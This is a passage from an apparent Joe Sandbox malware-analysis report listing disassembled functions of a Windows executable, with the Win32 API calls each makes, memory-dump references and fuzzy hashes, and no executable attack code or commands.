                            • GetSystemMetrics.USER32(0000000F), ref: 00440527
                            • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                            • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                            • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                            • String ID:
                            • API String ID: 1457242333-0
                            • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                            • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                            • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                            • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                            Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ConnectRegistry_memmove_wcslen
                            • String ID:
                            • API String ID: 15295421-0
                            • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                            • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                            • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                            • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                            Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • _wcstok.LIBCMT ref: 004675B2
                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                            • _wcscpy.LIBCMT ref: 00467641
                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                            • _wcslen.LIBCMT ref: 00467793
                            • _wcslen.LIBCMT ref: 004677BD
                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                            • String ID: X
                            • API String ID: 780548581-3081909835
                            • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                            • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                            • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                            • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                            Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                            • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                            • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                            • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                            • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                            • CloseFigure.GDI32(?), ref: 0044751F
                            • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                            • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                            • String ID:
                            • API String ID: 4082120231-0
                            • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                            • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                            • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                            • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                            Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                            • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                            • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                            • String ID:
                            • API String ID: 2027346449-0
                            • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                            • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                            • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                            • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                            Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                            • GetMenu.USER32 ref: 0047A703
                            • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                            • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                            • _wcslen.LIBCMT ref: 0047A79E
                            • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                            • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                            • String ID:
                            • API String ID: 3257027151-0
                            • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                            • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                            • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                            • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                            Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                            Download Yara Rule
                            APIs
                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ErrorLastselect
                            • String ID:
                            • API String ID: 215497628-0
                            • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                            • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                            • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                            • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                            Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetParent.USER32(?), ref: 0044443B
                            • GetKeyboardState.USER32(?), ref: 00444450
                            • SetKeyboardState.USER32(?), ref: 004444A4
                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                            • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                            • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                            • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                            Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetParent.USER32(?), ref: 00444633
                            • GetKeyboardState.USER32(?), ref: 00444648
                            • SetKeyboardState.USER32(?), ref: 0044469C
                            • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                            • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                            • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                            • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                            • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                            • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                            • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                            Function 0047DDC2 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 170COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __snwprintf__wcsicoll_wcscpy
                            • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                            • API String ID: 1729044348-3025626884
                            • Opcode ID: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                            • Instruction ID: fa375d034fa7217e9d4d929611683fd4ef9c76ca58110cba6d833e9902d6ecd0
                            • Opcode Fuzzy Hash: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                            • Instruction Fuzzy Hash: 5D5184719002099BCB10EF51C982AEFB779EF84308F10856BF905B7281D779AE45CBE9
                            Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                            • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                            • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                            • DeleteObject.GDI32(?), ref: 00455736
                            • DeleteObject.GDI32(?), ref: 00455744
                            • DestroyIcon.USER32(?), ref: 00455752
                            • DestroyWindow.USER32(?), ref: 00455760
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                            • String ID:
                            • API String ID: 2354583917-0
                            • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                            • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                            • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                            • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                            Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                            • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                            • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                            • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                            Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                            Download Yara Rule
                            APIs
                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$Enable$Show$MessageMoveSend
                            • String ID:
                            • API String ID: 896007046-0
                            • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                            • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                            • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                            • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                            Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                            • GetFocus.USER32 ref: 00448ACF
                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$Enable$Show$FocusMessageSend
                            • String ID:
                            • API String ID: 3429747543-0
                            • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                            • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                            • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                            • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                            Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
